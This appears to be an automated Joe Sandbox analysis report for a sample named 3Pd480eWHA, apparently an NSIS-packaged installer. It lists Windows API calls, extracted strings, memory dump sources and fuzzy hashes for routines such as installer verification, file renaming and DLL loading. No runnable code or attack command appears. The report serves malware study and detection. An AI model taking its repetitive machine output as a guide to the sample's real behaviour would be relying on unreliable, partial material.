                                                                                                • Part of subcall function 004058E4: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B41,00000000,[Rename],00000000,00000000,00000000), ref: 004058F4
                                                                                                • Part of subcall function 004058E4: lstrlenA.KERNEL32(00000000,?,00000000,00405B41,00000000,[Rename],00000000,00000000,00000000), ref: 00405926
                                                                                              • GetShortPathNameA.KERNEL32(?,007A06D0,00000400), ref: 00405AAE
                                                                                              • wsprintfA.USER32 ref: 00405ACC
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,007A06D0,C0000000,00000004,007A06D0,?), ref: 00405B07
                                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405B16
                                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405B4E
                                                                                              • SetFilePointer.KERNEL32(004093B0,00000000,00000000,00000000,00000000,0079FED0,00000000,-0000000A,004093B0,00000000,[Rename],00000000,00000000,00000000), ref: 00405BA4
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00405BB5
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00405BBC
                                                                                                • Part of subcall function 0040597F: GetFileAttributesA.KERNEL32(00000003,00402CA6,007A9C00,80000000,00000003), ref: 00405983
                                                                                                • Part of subcall function 0040597F: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 004059A5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2495567019.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.2495505650.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495621278.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495676639.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495933854.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                              • String ID: %s=%s$NUL$[Rename]
                                                                                              • API String ID: 222337774-4148678300
                                                                                              • Opcode ID: 3ad923b7e2ffebba14b4d0091a5c8973f8d5934e7dcb027ff098b41b160bb7b7
                                                                                              • Instruction ID: 28628270b370f13d709f2e98436788b9d19fd6dde28ce54c0a079e884eb7da61
                                                                                              • Opcode Fuzzy Hash: 3ad923b7e2ffebba14b4d0091a5c8973f8d5934e7dcb027ff098b41b160bb7b7
                                                                                              • Instruction Fuzzy Hash: 5A311371605B18ABD6206B215C89F6B3A6CDF45764F14013BFE01F22D2DA7CBC008EAD
                                                                                              APIs
                                                                                              • SetErrorMode.KERNEL32 ref: 00403111
                                                                                              • GetVersion.KERNEL32 ref: 00403117
                                                                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403140
                                                                                              • #17.COMCTL32(00000007,00000009), ref: 00403162
                                                                                              • OleInitialize.OLE32(00000000), ref: 00403169
                                                                                              • SHGetFileInfoA.SHELL32(0079D500,00000000,?,00000160,00000000), ref: 00403185
                                                                                              • GetCommandLineA.KERNEL32(007A1740,NSIS Error), ref: 0040319A
                                                                                              • GetModuleHandleA.KERNEL32(00000000,007A8000,00000000), ref: 004031AD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2495567019.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.2495505650.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495621278.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495676639.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495933854.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: CommandErrorFileHandleInfoInitializeLineModeModuleVersionlstrlen
                                                                                              • String ID: $NSIS Error$UXTHEME
                                                                                              • API String ID: 165832124-3141987311
                                                                                              • Opcode ID: 1ad40cf231cef688e36d91fd9a3e21bab93d8400c6bfb87b22026247c55ff5e7
                                                                                              • Instruction ID: 9530dd6589d81eaf48f38f9586a93627c9eaa123d35ec40a75715a6d1f0fb1b7
                                                                                              • Opcode Fuzzy Hash: 1ad40cf231cef688e36d91fd9a3e21bab93d8400c6bfb87b22026247c55ff5e7
                                                                                              • Instruction Fuzzy Hash: 7331A4B0808381AFE7216F609D0DB1B7EA8AB46345F40457EF585B62D2C77C5904876F
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,000003FB), ref: 0040437E
                                                                                              • SetWindowTextA.USER32(00000000,?), ref: 004043A8
                                                                                              • SHBrowseForFolderA.SHELL32(?,0079D918,?), ref: 00404459
                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00404464
                                                                                              • lstrcmpiA.KERNEL32(007A0EE0,0079E540), ref: 00404496
                                                                                              • lstrcatA.KERNEL32(?,007A0EE0), ref: 004044A2
                                                                                              • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004044B4
                                                                                                • Part of subcall function 004054E6: GetDlgItemTextA.USER32(?,?,00000400,004044EB), ref: 004054F9
                                                                                                • Part of subcall function 00405F77: CharNextA.USER32(?,*?|<>/":,00000000,007A8000,771B3410,007A9400,00000000,004030C7,007A9400,007A9400,004032DC), ref: 00405FCF
                                                                                                • Part of subcall function 00405F77: CharNextA.USER32(?,?,?,00000000), ref: 00405FDC
                                                                                                • Part of subcall function 00405F77: CharNextA.USER32(?,007A8000,771B3410,007A9400,00000000,004030C7,007A9400,007A9400,004032DC), ref: 00405FE1
                                                                                                • Part of subcall function 00405F77: CharPrevA.USER32(?,?,771B3410,007A9400,00000000,004030C7,007A9400,007A9400,004032DC), ref: 00405FF1
                                                                                              • GetDiskFreeSpaceA.KERNEL32(0079D510,?,?,0000040F,?,0079D510,0079D510,?,00000001,0079D510,?,?,000003FB,?), ref: 00404572
                                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040458D
                                                                                                • Part of subcall function 004046E6: lstrlenA.KERNEL32(0079E540,0079E540,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404601,000000DF,00000000,00000400,?), ref: 00404784
                                                                                                • Part of subcall function 004046E6: wsprintfA.USER32 ref: 0040478C
                                                                                                • Part of subcall function 004046E6: SetDlgItemTextA.USER32(?,0079E540), ref: 0040479F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2495567019.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.2495505650.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495621278.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495676639.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495933854.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                              • String ID: @y$A
                                                                                              • API String ID: 2624150263-3907635629
                                                                                              • Opcode ID: 1f04011cd929a6ac753454b4e803030b1d74a73dbc625a6aba5b626a06529df5
                                                                                              • Instruction ID: dc70ebfb722856edf20ca9fe518129045a13840cef36c67e0ec65d3b8ea71268
                                                                                              • Opcode Fuzzy Hash: 1f04011cd929a6ac753454b4e803030b1d74a73dbc625a6aba5b626a06529df5
                                                                                              • Instruction Fuzzy Hash: 69A182B1900208ABDB11EFA5DC45BAF77B8EF85314F10843BF601B62D1D77C9A418B69
                                                                                              APIs
                                                                                              • GetVersion.KERNEL32(?,0079DD20,00000000,00404F5D,0079DD20,?), ref: 00405DDF
                                                                                              • GetSystemDirectoryA.KERNEL32(007A0EE0,00000400), ref: 00405E5A
                                                                                              • GetWindowsDirectoryA.KERNEL32(007A0EE0,00000400), ref: 00405E6D
                                                                                              • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00405EA9
                                                                                              • SHGetPathFromIDListA.SHELL32(?,007A0EE0), ref: 00405EB7
                                                                                              • CoTaskMemFree.OLE32(?), ref: 00405EC2
                                                                                              • lstrcatA.KERNEL32(007A0EE0,\Microsoft\Internet Explorer\Quick Launch), ref: 00405EE4
                                                                                              • lstrlenA.KERNEL32(007A0EE0,?,0079DD20,00000000,00404F5D,0079DD20,?), ref: 00405F36
                                                                                              Strings
                                                                                              • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00405EDE
                                                                                              • ., xrefs: 00405DF5
                                                                                              • Software\Microsoft\Windows\CurrentVersion, xrefs: 00405E29
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2495567019.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.2495505650.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495621278.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495676639.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495933854.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                              • String ID: .$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                              • API String ID: 900638850-3562769014
                                                                                              • Opcode ID: 73dbfc29bf3470c7d6367ce376a7e9113c10d5c9b9e67424bfeb29fbed748c0a
                                                                                              • Instruction ID: 9bfabfc36fba32fb106481ebf294e43342570200e8730ead7ab322b99494356e
                                                                                              • Opcode Fuzzy Hash: 73dbfc29bf3470c7d6367ce376a7e9113c10d5c9b9e67424bfeb29fbed748c0a
                                                                                              • Instruction Fuzzy Hash: F7611231904A05ABEF115B24CC84BBF7BA8DB56314F10813BE555BA2D1D33D4A82DF9E
                                                                                              APIs
                                                                                              • GetWindowLongA.USER32(?,000000EB), ref: 00403F75
                                                                                              • GetSysColor.USER32(00000000), ref: 00403F91
                                                                                              • SetTextColor.GDI32(?,00000000), ref: 00403F9D
                                                                                              • SetBkMode.GDI32(?,?), ref: 00403FA9
                                                                                              • GetSysColor.USER32(?), ref: 00403FBC
                                                                                              • SetBkColor.GDI32(?,?), ref: 00403FCC
                                                                                              • DeleteObject.GDI32(?), ref: 00403FE6
                                                                                              • CreateBrushIndirect.GDI32(?), ref: 00403FF0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2495567019.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.2495505650.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495621278.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495676639.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495933854.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2320649405-0
                                                                                              • Opcode ID: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                                                              • Instruction ID: 03c35b03fdde5f33accd48f8e357bf0732577442a8f103693b6bf1e6191b16fb
                                                                                              • Opcode Fuzzy Hash: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                                                              • Instruction Fuzzy Hash: 71216271904705ABCB219F68ED48B4BBFF8AF01715B04892AF996A22E0D734EA04CB55
                                                                                              APIs
                                                                                              • GlobalAlloc.KERNEL32(00000040,00000020), ref: 00402E17
                                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,?,?,?,?,000000FF,00000000,00000000,?,?), ref: 00402E7D
                                                                                                • Part of subcall function 00402C02: DestroyWindow.USER32(?,00000000,00402DE2,00000001), ref: 00402C15
                                                                                              Strings
                                                                                              • Null, xrefs: 00402D5D
                                                                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E3E
                                                                                              • Inst, xrefs: 00402D4B
                                                                                              • soft, xrefs: 00402D54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2495567019.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.2495505650.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495621278.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495676639.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495933854.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocDestroyFileGlobalPointerWindow
                                                                                              • String ID: Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                              • API String ID: 1580554587-639894862
                                                                                              • Opcode ID: fffe8b8e403523734369af5898b5e11c6e0617be3f7447c34a35d2c165863f8a
                                                                                              • Instruction ID: 39178c7b2a097e10986a8221dbe80c0c0983fb1c2a92df0a9df461dc277e373f
                                                                                              • Opcode Fuzzy Hash: fffe8b8e403523734369af5898b5e11c6e0617be3f7447c34a35d2c165863f8a
                                                                                              • Instruction Fuzzy Hash: 6241D1319412489FEF21CF64DA89B9E7BA4AF00364F14803BE904B62D1D7BC8E408B99
                                                                                              APIs
                                                                                              • lstrlenA.KERNEL32(0079DD20), ref: 00404F5E
                                                                                              • lstrlenA.KERNEL32(?,0079DD20), ref: 00404F6E
                                                                                              • lstrcatA.KERNEL32(0079DD20,?,?,0079DD20), ref: 00404F81
                                                                                              • SetWindowTextA.USER32(0079DD20,0079DD20), ref: 00404F93
                                                                                              • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FB9
                                                                                              • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FD3
                                                                                              • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FE1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2495567019.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.2495505650.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495621278.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495676639.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495933854.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                              • String ID:
                                                                                              • API String ID: 2531174081-0
                                                                                              • Opcode ID: ae5a33e3d6ef4a2dfae6681722ed20d30719a13dce45ba5cd49bbad590cb7158
                                                                                              • Instruction ID: b1dc6bec94ba42b715134808c0c3c35089c42976f802e7ea77bea70e7b84fba8
                                                                                              • Opcode Fuzzy Hash: ae5a33e3d6ef4a2dfae6681722ed20d30719a13dce45ba5cd49bbad590cb7158
                                                                                              • Instruction Fuzzy Hash: 1F21817190011DBFDF119FA5DD449DEBFA9EF45354F04807AFA04A6291C7388E409BA8
                                                                                              APIs
                                                                                              • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040480B
                                                                                              • GetMessagePos.USER32 ref: 00404813
                                                                                              • ScreenToClient.USER32(?,?), ref: 0040482D
                                                                                              • SendMessageA.USER32(?,00001111,00000000,?), ref: 0040483F
                                                                                              • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404865
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2495567019.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.2495505650.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495621278.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495676639.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495933854.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$Send$ClientScreen
                                                                                              • String ID: f
                                                                                              • API String ID: 41195575-1993550816
                                                                                              • Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                                                              • Instruction ID: d51aeaa30401db709ca0a87e6a09b4ddb89123452d3ebce91a639796f0b83af5
                                                                                              • Opcode Fuzzy Hash: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                                                              • Instruction Fuzzy Hash: 54019275D00218BADB00DBA4CC41BFEBBBCAF85711F10412BBB10B71C0C7B465018BA5
                                                                                              APIs
                                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B9A
                                                                                              • MulDiv.KERNEL32(?,00000064,?), ref: 00402BC5
                                                                                              • wsprintfA.USER32 ref: 00402BD5
                                                                                              • SetWindowTextA.USER32(?,?), ref: 00402BE5
                                                                                              • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BF7
                                                                                              Strings
                                                                                              • verifying installer: %d%%, xrefs: 00402BCF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2495567019.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.2495505650.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495621278.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495676639.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495933854.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                                              • String ID: verifying installer: %d%%
                                                                                              • API String ID: 1451636040-82062127
                                                                                              • Opcode ID: 48144200f4c6f9ee60b46832c8e283eb409d8b227d927ad2aa9f7c6060ff8dca
                                                                                              • Instruction ID: 06d6233bfb864841df38fb05631849b064d35824abf3621066cb5e46443ac4cc
                                                                                              • Opcode Fuzzy Hash: 48144200f4c6f9ee60b46832c8e283eb409d8b227d927ad2aa9f7c6060ff8dca
                                                                                              • Instruction Fuzzy Hash: EE014F70540209FBEF209F60DD4AEAE3B69AB04304F00803AFA16B92D0D7B8A951DB59
                                                                                              APIs
                                                                                              • CreateDirectoryA.KERNEL32(?,?,00000000), ref: 0040542E
                                                                                              • GetLastError.KERNEL32 ref: 00405442
                                                                                              • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405457
                                                                                              • GetLastError.KERNEL32 ref: 00405461
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2495567019.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.2495505650.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495621278.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495676639.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495933854.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                              • String ID: ds@$ts@
                                                                                              • API String ID: 3449924974-968229870
                                                                                              • Opcode ID: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
                                                                                              • Instruction ID: 8acfd36fb30660db29d177a8be8d7647adb8d58efdd4f3c758bfd1505ce0b010
                                                                                              • Opcode Fuzzy Hash: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
                                                                                              • Instruction Fuzzy Hash: CF010871D14259EADF119FA4D9447EFBFB8EF04315F004176E904B6290D378A644CFAA
                                                                                              APIs
                                                                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040604E
                                                                                              • wsprintfA.USER32 ref: 00406087
                                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 0040609B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2495567019.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.2495505650.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495621278.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495676639.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495933854.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                              • String ID: %s%s.dll$UXTHEME$\
                                                                                              • API String ID: 2200240437-4240819195
                                                                                              • Opcode ID: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
                                                                                              • Instruction ID: 17439860729f5247506b6fa79cc71e4dc0dc9fec6db89644704a68070b9bc3a3
                                                                                              • Opcode Fuzzy Hash: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
                                                                                              • Instruction Fuzzy Hash: BAF0F630A40209ABEB14EB78DC0DFEB365CAB08305F14017AB547F11D2EA78E8258B69
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2524428660.00000000389C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 389C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_389c0000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $q$$q$$q$$q$$q$$q$$q$$q
                                                                                              • API String ID: 0-3886557441
                                                                                              • Opcode ID: dd19e754ec2ba7b95df9b2f568c17cb05cca4a5ede58cc7b217844c0bf669aad
                                                                                              • Instruction ID: 3c7d5a82b2c23052c9c957789b6f4233b486130491fbc6ff1e557955386349ce
                                                                                              • Opcode Fuzzy Hash: dd19e754ec2ba7b95df9b2f568c17cb05cca4a5ede58cc7b217844c0bf669aad
                                                                                              • Instruction Fuzzy Hash: 5E91A3B4A00309DFEB14DB65D955BAE7BF7BF84345F208529E401AB390DB769C42CB81
                                                                                              APIs
                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040271A
                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402736
                                                                                              • GlobalFree.KERNEL32(?), ref: 0040276F
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00402782
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040279A
                                                                                              • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027AE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2495567019.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.2495505650.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495621278.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495676639.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495933854.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                              • String ID:
                                                                                              • API String ID: 2667972263-0
                                                                                              • Opcode ID: 4b894f8d3e924aec19ae082312aeb976ceb27c72decf70bd39f3be7f131da9ef
                                                                                              • Instruction ID: f67dc9fade15bd1aaf4953b10d7ffc98cf8df4ed40540c93fb8cebdcb82cf2c3
                                                                                              • Opcode Fuzzy Hash: 4b894f8d3e924aec19ae082312aeb976ceb27c72decf70bd39f3be7f131da9ef
                                                                                              • Instruction Fuzzy Hash: 71217A71800128BBCF216FA5DE49EAEBB79EF09324F10022AF914762E1C7795D018B99
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2495567019.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.2495505650.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495621278.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495676639.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495933854.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountTick$wsprintf
                                                                                              • String ID: ... %d%%
                                                                                              • API String ID: 551687249-2449383134
                                                                                              • Opcode ID: a1d6832c6bc444ff6d010b630c712fb48df73d3c77c6344f27a78c0d96af84d3
                                                                                              • Instruction ID: 2edc22cfff0ae19664cdd2150d7fdb1cf503ee3651ca8202b139e1cdffcd4696
                                                                                              • Opcode Fuzzy Hash: a1d6832c6bc444ff6d010b630c712fb48df73d3c77c6344f27a78c0d96af84d3
                                                                                              • Instruction Fuzzy Hash: 2C419072D0120ADBDB10DFA5DA44B9E7BB8AB00355F14813BE911B72D4C3B88A51DB9A
                                                                                              APIs
                                                                                              • lstrlenA.KERNEL32(0079E540,0079E540,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404601,000000DF,00000000,00000400,?), ref: 00404784
                                                                                              • wsprintfA.USER32 ref: 0040478C
                                                                                              • SetDlgItemTextA.USER32(?,0079E540), ref: 0040479F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2495567019.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.2495505650.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495621278.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495676639.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495933854.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
